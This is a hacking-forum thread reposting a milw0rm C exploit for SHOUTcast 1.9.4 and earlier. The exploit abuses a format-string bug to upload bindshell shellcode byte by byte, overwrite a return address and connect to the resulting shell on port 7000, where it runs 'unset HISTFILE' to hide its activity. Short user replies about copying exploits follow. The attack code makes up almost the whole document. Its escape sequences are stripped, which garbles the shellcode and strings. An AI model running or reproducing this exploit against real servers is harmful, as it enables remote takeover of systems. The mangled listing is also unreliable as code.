Hacking and more... / Exploituri si POCs / SHOUTcast <= 1.9.4 File Request Format String Exploit (Leaked) Moderat de Shocker
snark
Code:

/* 
 * Shoutcast <= 1.9.4 exploit by crash-x
 * Tries to upload the shellcode to a fixed address
 * and execute it. 
 *
 * This exploit was _not_ written by Simon 'Zodiac' Moser (segfault.ch).
 */

#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#include <stdarg.h>
#include <signal.h>    

/* TCP port main() hands to get_shell(); matches the "bindshell (7000)" note
 * on the shellcode array below. */
#define SHELL_PORT 7000
/* First line get_shell() sends once its connection is up. */
#define SHELL_COMMAND "unset HISTFILE; uname -a; id;"


#if 1
/*
 * Payload that write_shellcode() uploads one byte per round trip; the
 * address it lands at is recorded in targets[].retaddr and written by main().
 *
 * NOTE(review): as reproduced on this page the "\x" escape prefixes are
 * missing (most other backslashes in the listing are gone too, e.g. "n"
 * where "\n" was clearly meant in the printf strings), so as shown this is a
 * plain ASCII string "x31xc0..." and strlen(shellcode) counts those letters.
 * The "#if 1" guard is always true — presumably a leftover from switching
 * between payloads; confirm before relying on it.
 */
unsigned char shellcode[] = /* bindshell (7000) (Unknown) */
               "x31xc0x50x50x66xc7x44x24x02x1bx58xc6x04x24x02x89xe6"
               "xb0x02xcdx80x85xc0x74x08x31xc0x31xdbxb0x01xcdx80x50"
               "x6ax01x6ax02x89xe1x31xdbxb0x66xb3x01xcdx80x89xc5x6a"
               "x10x56x50x89xe1xb0x66xb3x02xcdx80x6ax01x55x89xe1x31"
               "xc0x31xdbxb0x66xb3x04xcdx80x31xc0x50x50x55x89xe1xb0"
               "x66xb3x05xcdx80x89xc5x31xc0x89xebx31xc9xb0x3fxcdx80"
               "x41x80xf9x03x7cxf6x31xc0x50x68x2fx2fx73x68x68x2fx62"
               "x69x6ex89xe3x50x53x89xe1x99xb0x0bxcdx80"; 
#endif


/*
 * Per-version parameters consumed by write_shellcode() and main().
 *
 *   platform   - name printed by usage() and main()
 *   retloc     - address main() writes retaddr into
 *   retaddr    - value written to retloc; filled in at run time by
 *                write_shellcode(), so 0xdeadbabe is only a placeholder
 *   dpa_offset - the N in the "%N$hn" conversions of the format strings
 *
 * Row 0 is the "auto-detect" pseudo target. A NULL platform terminates the
 * table; the counting loops in usage() and main() rely on it.
 */
struct targ {
    char *platform;
    int retloc;
    int retaddr;
    int dpa_offset;
};

struct targ targets[] = {
    [0] = { .platform = "Try to determine target",
            .retloc = 0xdeadbabe, .retaddr = 0xdeadbabe, .dpa_offset = 123 },
    [1] = { .platform = "Shoutcast 1.9.4 all Linux distros",
            .retloc = 0x0806493c, .retaddr = 0xdeadbabe, .dpa_offset = 2534 }, /* dpa_offset taken from coki and tal0n's exploit */
    [2] = { .platform = "Shoutcast 1.9.2 all Linux distros",
            .retloc = 0x0806c270, .retaddr = 0xdeadbabe, .dpa_offset = 2536 },
    [3] = { .platform = NULL },
};


/* Print the command-line help followed by the target table, then exit(1).
 * `a` is argv[0] and only appears in the first line. (The tab/newline
 * escapes look stripped in this listing — "tt-ht", "n" — so the text is
 * reproduced exactly as shown.) */
void usage(char *a){
    static const char *const help_lines[] = {
        "[!] Options:n",
        "tt-htHostname you want attack (required)n",
        "tt-ptPort of the shoutcast (default: 8000)n",
        "tt-ttTarget (default: 0)n",
        "tt-stHow long to sleep before try connect to shell in s (default: 1)n",
        "tt-StHow long to sleep before write the next byte of shellcode to the memory in ms (default: 7)n",
        "[!] Targets:n",
    };
    size_t k;
    const struct targ *t;

    printf("[-] Usage: %s -h <host> [options]n", a);
    for (k = 0; k < sizeof help_lines / sizeof help_lines[0]; k++)
        fputs(help_lines[k], stdout);
    /* one line per table row; the NULL platform ends the table */
    for (t = targets; t->platform; t++)
        printf("tt%dt %sn", (int)(t - targets), t->platform);
    exit(1);
}
    

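/*
 * printf-style formatting straight into a socket.
 *
 * Formats `s` with the remaining arguments, sends the text with a single
 * send() and returns send()'s result (bytes sent, or -1 on error). Returns
 * -1 if formatting fails or the buffer cannot be allocated.
 *
 * Fixes: the GNU-only vasprintf() is replaced by a two-pass vsnprintf()
 * (C99), so the function builds with -std=c11, and va_end() is now reached
 * on the failure path as well (it was skipped before).
 */
int sockprintf(int sock, const char *s, ...){
    va_list arg, arg2;
    int len;
    char *buf;
    ssize_t sent;

    va_start(arg, s);
    va_copy(arg2, arg);
    len = vsnprintf(NULL, 0, s, arg);      /* pass 1: measure */
    va_end(arg);
    if (len < 0) {
        va_end(arg2);
        return -1;
    }

    buf = malloc((size_t)len + 1);
    if (buf == NULL) {
        va_end(arg2);
        return -1;
    }
    vsnprintf(buf, (size_t)len + 1, s, arg2);   /* pass 2: format */
    va_end(arg2);

    /* strlen() rather than len keeps the original semantics: an embedded
     * NUL produced by the format still cuts the transmission short */
    sent = send(sock, buf, strlen(buf), 0);
    free(buf);
    return (int)sent;
}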


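/*
 * Fill addr->sin_addr from a dotted-quad IPv4 literal or a host name.
 *
 * inet_pton() is tried first; anything it rejects goes through
 * gethostbyname() and the first returned address is copied. Only sin_addr is
 * written — sin_family and sin_port are left to the caller (conn() sets them).
 *
 * Returns 0 on success, -1 (after printing a message) if the name does not
 * resolve or does not yield an IPv4 address of the expected length.
 *
 * Changes: inet_pton() (POSIX) instead of the BSD inet_aton(); the result is
 * copied with memcpy() and its family/length checked instead of dereferencing
 * h_addr through a cast, and the parameter is const-qualified.
 */
int resolv(struct sockaddr_in *addr, const char *hostn){
    struct hostent *host;

    if (inet_pton(AF_INET, hostn, &addr->sin_addr) == 1)
        return 0;

    host = gethostbyname(hostn);
    /* h_addr_list[0] is what the legacy h_addr macro expands to */
    if (host == NULL || host->h_addrtype != AF_INET
        || host->h_length != (int)sizeof(struct in_addr)
        || host->h_addr_list[0] == NULL){
        printf("[-] Wasnt able to resolve %s!n", hostn);
        return -1;
    }
    memcpy(&addr->sin_addr, host->h_addr_list[0], sizeof(struct in_addr));
    return 0;
}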


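/*
 * Open a TCP connection to addr (sin_addr already filled in) on `port`.
 *
 * addr is passed by value so the caller's copy is untouched; sin_port and
 * sin_family are set here. Returns the connected descriptor, or -1 if
 * socket() or connect() fails.
 *
 * Fix: the socket was leaked when connect() failed; it is now closed on
 * that path.
 */
int conn(struct sockaddr_in addr, int port){
    int sock = socket(PF_INET, SOCK_STREAM, 0);

    if (sock == -1)
        return -1;

    addr.sin_port = htons((unsigned short)port);
    addr.sin_family = AF_INET;

    if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1){
        close(sock);   /* previously leaked */
        return -1;
    }
    return sock;
}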


/*
 * Connect to the listener the payload is expected to have opened and relay
 * stdin/stdout to it until the process is killed.
 *
 * addr   - target address (the port is replaced by `port` in conn())
 * port   - TCP port to connect to (main() passes SHELL_PORT)
 * sleeps - seconds to wait before the first connection attempt
 *
 * Returns -1 if the connection cannot be made. Otherwise it never returns:
 * the relay loop only leaves through exit(1), so the trailing "return 0" is
 * dead code.
 */
int get_shell(struct sockaddr_in addr, int port, int sleeps){
    int sock;
    char buffer[1024];
    fd_set fds;
        
    /* presumably so that Ctrl-C typed into the relay does not kill it */
    signal(SIGINT, SIG_IGN);

    /* "-s": time for the listener to come up before we try it */
    sleep(sleeps);

    if((sock = conn(addr, port)) == -1)
        return (-1);
    printf("[+] Wooohooo we got a shell!n");
    sockprintf(sock, SHELL_COMMAND"rn");
    while(1){
        FD_ZERO(&fds);
        FD_SET(0, &fds);
        FD_SET(sock, &fds);

        /* NOTE(review): nfds is hard-coded to 255 instead of sock + 1; works
         * while descriptors are small, but FD_SET on a descriptor >= FD_SETSIZE
         * is undefined behaviour. */
        if (select(255, &fds, NULL, NULL, NULL) == -1){
            fprintf(stderr,"[-] sending failedn");
            close(sock);
            exit(1);
        }

        memset(buffer, 0x0, sizeof(buffer));
        if (FD_ISSET(sock, &fds)){
            /* NOTE(review): only -1 counts as "closed". recv() returns 0 on an
             * orderly shutdown, after which select() reports the socket readable
             * straight away and this loop spins printing empty strings. A full
             * 1024-byte read also leaves buffer without a terminator for "%s". */
            if (recv(sock, buffer, sizeof(buffer), 0) == -1){
                fprintf(stderr, "[-] Connection closed by remote host!n");
                close(sock);
                exit(1);
            }
            fprintf(stderr, "%s", buffer);
        }

        if (FD_ISSET(0, &fds)){
            /* NOTE(review): read()'s result is ignored; write() then uses
             * strlen(), i.e. stops at the first NUL instead of at the byte count
             * read, and has no terminator to stop at if all 1024 bytes were read. */
            read(0, buffer, sizeof(buffer));
            write(sock, buffer, strlen(buffer));
        }
    }
    return 0;
}


/* One-line progress indicator for the upload loop: a four-frame spinner
 * (its phase lives in a static counter across calls) followed by the byte
 * index and the address it is being written to. The line is meant to end in
 * a carriage return so the next call overwrites it — the escape is mangled
 * to a bare "r" in this listing — and stdout is flushed explicitly. */
void status(int i, int retloc){
    static const char *const frames[] = { "[|] ", "[/] ", "[-] ", "[\] " };
    static int frame = 1;                  /* 1..4, same cycle as the original counter */

    fputs(frames[frame - 1], stdout);
    frame = (frame % 4) + 1;

    printf("Uploading shellcode[%d] to [%p]r", i, (void *)retloc);
    fflush(stdout);
}


/*
 * Push `shellcode` into the target process one byte per round trip.
 *
 * Every iteration opens two connections to the SHOUTcast port: the first
 * request carries the destination address as four raw bytes in the URL
 * (after "DD"), the second carries a format string whose "%N$hn"
 * (N = targets[target].dpa_offset) is meant to make the vulnerable printf
 * write that byte's value there. retloc starts just below 0xc0000000 and is
 * advanced by one per byte; the start value is stored in
 * targets[target].retaddr for main() to use afterwards.
 *
 * addr/port - target; target - index into targets[]; wsleeps - pause between
 * bytes (unit: see the note at the bottom of the loop).
 * Returns 0 once every request has been sent, -1 as soon as a connect fails.
 */
int write_shellcode(struct sockaddr_in addr, int port, int target, int wsleeps){
    char buffer[1024];
    /* strlen() yields size_t and 0xc0000000 exceeds INT_MAX, so the
     * conversion to int is implementation-defined (wraps on gcc) */
    int retloc = ((0xc0000000) - 8 - strlen(shellcode)), i = 0, sock;

    targets[target].retaddr = retloc;

    for(i = 0; i < strlen(shellcode); i++, retloc++){
        if((sock = conn(addr, port)) == -1)
            return -1;

        status(i, retloc);

        /* request 1: the raw address, NUL-terminated at offset 4 so it can
         * be formatted with %s. NOTE(review): assumes a 4-byte pointer — on
         * a 64-bit build the store writes 8 bytes and the terminator lands
         * in the middle of it. */
        *((void **)(buffer)) = (void *)((retloc));
        buffer[4] = 0x0;
        sockprintf(sock, "GET /content/DD%s.mp3 HTTP/1.1rnrn", buffer);

        close(sock);

        /* request 2: a format string that emits shellcode[i] characters
         * before the %hn — via a precision on %u, or via literal 'A' padding
         * when the value is 9 or less */
        if(shellcode[i] > 9)
            snprintf(buffer, sizeof(buffer), "%%.%du%%%d$hn", shellcode[i], targets[target].dpa_offset);
        else {
            memset(buffer, 0x41, shellcode[i]);
            /* NOTE(review): the size argument should be
             * sizeof(buffer) - shellcode[i]; harmless in practice because
             * shellcode[i] <= 9 here and the text is a few bytes long. */
            snprintf(buffer + shellcode[i], sizeof(buffer), "%%%d$hn", targets[target].dpa_offset);
        }

        if((sock = conn(addr, port)) == -1)
            return -1;

        sockprintf(sock, "GET /content/%s.mp3 HTTP/1.1rnrn", buffer);
        close(sock);
//        sleep(1);
        /* NOTE(review): usage() documents -S in milliseconds, but this waits
         * wsleeps * 100 ms, so the default of 7 pauses 700 ms per byte. */
        usleep(wsleeps * 100000);
    }
    return 0;

}


/*
 * Banner-grab the server to choose a row of targets[].
 *
 * Requests a path that does not exist, reads the reply and takes the text
 * between the first two "<BR>" tags as the version string, which is then
 * matched against the supported Linux builds.
 *
 * Returns the targets[] index (1 or 2) on a match; -1 when the version
 * could not be read or is not supported (a message is printed first); -2
 * when the connection itself failed — main() treats -2 as fatal even when
 * the target was chosen by hand.
 *
 * NOTE(review): `sock` is never closed on any path, and a 0-byte recv()
 * (peer closed) is not told apart from a reply — it just fails the "<BR>"
 * search below.
 */
int get_target(struct sockaddr_in addr, int port){
    char buffer[1024], *ptr, *ptr2;
    int sock, bytes;

    if((sock = conn(addr, port)) == -1){
        printf("failed!r[-]n"); 
        return -2;
    }     
    printf("done!n");   /* completes the "Connecting to target... " line main() started */

    sockprintf(sock, "GET /doesntmatter HTTP/1.1rnrn");
    
    if((bytes = recv(sock, buffer, sizeof(buffer)-1, 0)) == -1){
        printf("[-] Wasnt able to determine version of server, do it yourself!n");
        return -1;
    }
    buffer[bytes] = 0x0;   /* sizeof(buffer)-1 above leaves room for this terminator */

    if(!(ptr = strstr(buffer, "<BR>"))){
        printf("[-] Wasnt able to determine version of server, do it yourself!n");    
        return -1;
    }
    ptr += 4;   /* step over the tag itself */
    if(!(ptr2 = strstr(ptr, "<BR>"))){
        printf("[-] Wasnt able to determine version of server, do it yourself!n");    
        return -1;
    }
    *ptr2 = 0x0;   /* cut the version text at the second tag */

    printf("[!] Version: %sn", ptr);

    if(strstr(ptr, "Server/Linux v1.9.4"))
        return 1;
    else if(strstr(ptr, "Server/Linux v1.9.2"))
        return 2;
    else if(strstr(ptr, "Server/FreeBSD")){   
        printf("[-] The server runs on FreeBSD, it could be FBSD 4.x or 5.x choose the target yourself!n");
        return -1;
    } else {
        printf("[-] Wasnt able to find target for this server!n");
        return -1;
    }

    return -1;   /* unreachable: every branch above returns */
}


/*
 * Entry point: parse options, resolve the host, pick a targets[] row,
 * upload the payload, write its address to retloc and connect to the
 * resulting listener.
 *
 * Options: -h host (required), -p port (default 8000), -t target index
 * (default 0 = auto-detect through get_target()), -s seconds to wait
 * before the shell connect, -S pause between uploaded bytes (see
 * write_shellcode() for the real unit).
 *
 * Exit status: 1 after a complete run (note: 1 normally signals failure),
 * -1 (255 to the shell) on the error paths, -1/-2 (255/254) straight from
 * get_target() when auto-detection fails.
 */
int main(int argc, char **argv){
    char *hostn = NULL, buffer[1024];
    int i, sock, opt, target = 0, port = 8000, shell_port = SHELL_PORT, sleeps = 1, wsleeps = 7;
    unsigned short ret1, ret2;
    struct sockaddr_in addr;   /* never zeroed; only sin_addr/sin_port/sin_family get set */

    printf("[!] Shoutcast <= 1.9.4 exploit by crash-xn");
  
    if (argc < 2)
        usage(argv[0]);
    
    while ((opt = getopt (argc, argv, "h:p:t:s:S:")) != -1){
        switch (opt){
            case 'h':
                hostn = optarg;
                break;
            case 'p':
                /* atoi() reports no errors; non-numeric input becomes 0 and is
                 * rejected by the range check below */
                port = atoi(optarg);
                if(port > 65535 || port < 1){
                    printf("[-] Port %d is invalidn",port);
                    return 1;
                }
                break;
            case 't':
                /* NOTE(review): only the upper bound is checked — a negative
                 * value passes and indexes targets[] out of bounds later on */
                target = atoi(optarg);
                for(i = 0; targets[i].platform; i++);   /* count rows (NULL-terminated) */
                if(target >= i){
                    printf("[-] Wtf are you trying to target?n");
                    usage(argv[0]);
                }
                break;
            case 's': 
                sleeps = atoi(optarg);    /* unchecked; negative ends up in sleep() */
                break;
            case 'S': 
                wsleeps = atoi(optarg);   /* unchecked; negative ends up in usleep() */
                break;
            default:
                usage(argv[0]);
        }
    }

    if(hostn == NULL)
        usage(argv[0]);

    /* NOTE(review): the return value is ignored — on a resolution failure
     * addr.sin_addr is whatever the uninitialised struct held and the run
     * carries on with it */
    resolv(&addr, hostn);

    printf("[!] Connecting to target... ");
    fflush(stdout);
    /* target 0 means "auto-detect"; with a hand-picked target get_target()
     * still runs for its banner line, but only a connect failure (-2) aborts */
    if(target == 0){
        if((target = get_target(addr, port)) < 0)
            return target;
    } else 
        if(get_target(addr, port) == -2)
            exit(-2);

    printf("[!] Targeting: %sn", targets[target].platform);
    

    if(write_shellcode(addr, port, target, wsleeps) != -1)
        printf("[+]n[+] Uploaded shellcode succesfuln");
    else {
        printf("[-]n[-] Wasn't able to upload shellcode, server probably crashed!n");
        return -1;
    }

    /* retaddr was filled in by write_shellcode(); the int -> void* casts are
     * for %p only */
    printf("[!] Writing retaddr [%p] to retloc [%p]n", (void *)targets[target].retaddr, (void *)targets[target].retloc);


    if((sock = conn(addr, port)) == -1){
        printf("[-] Connecting failed!n");
        return -1;
    }
    /* first request: retloc and retloc+2 as two raw 4-byte addresses, one per
     * 16-bit half written below. NOTE(review): both stores assume a 4-byte
     * pointer; on a 64-bit build each writes 8 bytes and the second overlaps
     * the first. */
    memset(buffer, 0x0, sizeof(buffer));
    *((void **)(buffer)) = (void *)(targets[target].retloc);
    *((void **)(buffer + 4)) = (void *)(targets[target].retloc + 2);
    sockprintf(sock, "GET /content/DD%s.mp3 HTTP/1.1rnrn", buffer);
    close(sock);

    /* split retaddr into its high and low 16-bit halves */
    ret1 = (targets[target].retaddr & 0xffff0000) >> 16;
    ret2 = (targets[target].retaddr & 0x0000ffff);

    /* second request: two "%.<count>u%<N>$hn" pairs, one per half; the
     * second count is relative to the first because %hn reports the running
     * total. NOTE(review): (ret2 - ret1) is an int passed for %u and ret1 is
     * promoted to int too — -Wformat mismatches, harmless on this ABI. */
    snprintf(buffer, sizeof(buffer), "%%.%uu%%%d$hn%%.%uu%%%d$hn", 
            ret1, targets[target].dpa_offset + 1, (ret2 - ret1), targets[target].dpa_offset);

    if((sock = conn(addr, port)) == -1){
        printf("[-] Connecting failed!n");
        return -1;
    }
    /* NOTE(review): this descriptor is never closed before get_shell() */
    sockprintf(sock, "GET /content/%s.mp3 HTTP/1.1rnrn", buffer);

    if(get_shell(addr, shell_port, sleeps) == -1){
        printf("[-] Exploit failedn");
        return -1;
    }
    return 1;
}

// milw0rm.com [2006-01-28]



pus acum 17 ani
   
Zero_Cool
Degeaba nu primesti moderator 

pus acum 17 ani
   
DarkTempo
cat va puteti certa pe tema asta    ca si cum ar fi ceva atat de special sa fi moderator
anyway chill dudes ... it's better for all of us



pus acum 17 ani
   
snark
n-am vrut sa credeti ca am postat ca sa iau mod, am facut aceiasi chestie ca si tine.. ce am gasit pe milw0rm am postat aici ... si cred ca nimeni nu o sa foloseasca aceste exploituri. (nici cele postate de mine nici cele postate de tine ) 

pus acum 17 ani
   
ystenly
Zero_Cool a scris:

Degeaba nu primesti moderator 


...cata frustrare...



pus acum 17 ani
   
tw8
Nu inteleg de ce dati Copy->Paste in loc sa creati voi ceva...milw0rm e cunoscut de toti si daca ai nevoie de ceva intri direct acolo oricum(o sa iti amintesti la pastele cailor k e si aici xploitu' care iti trebuie)...cred ca se incark forumu' degeaba(parerea mea).

pus acum 17 ani
   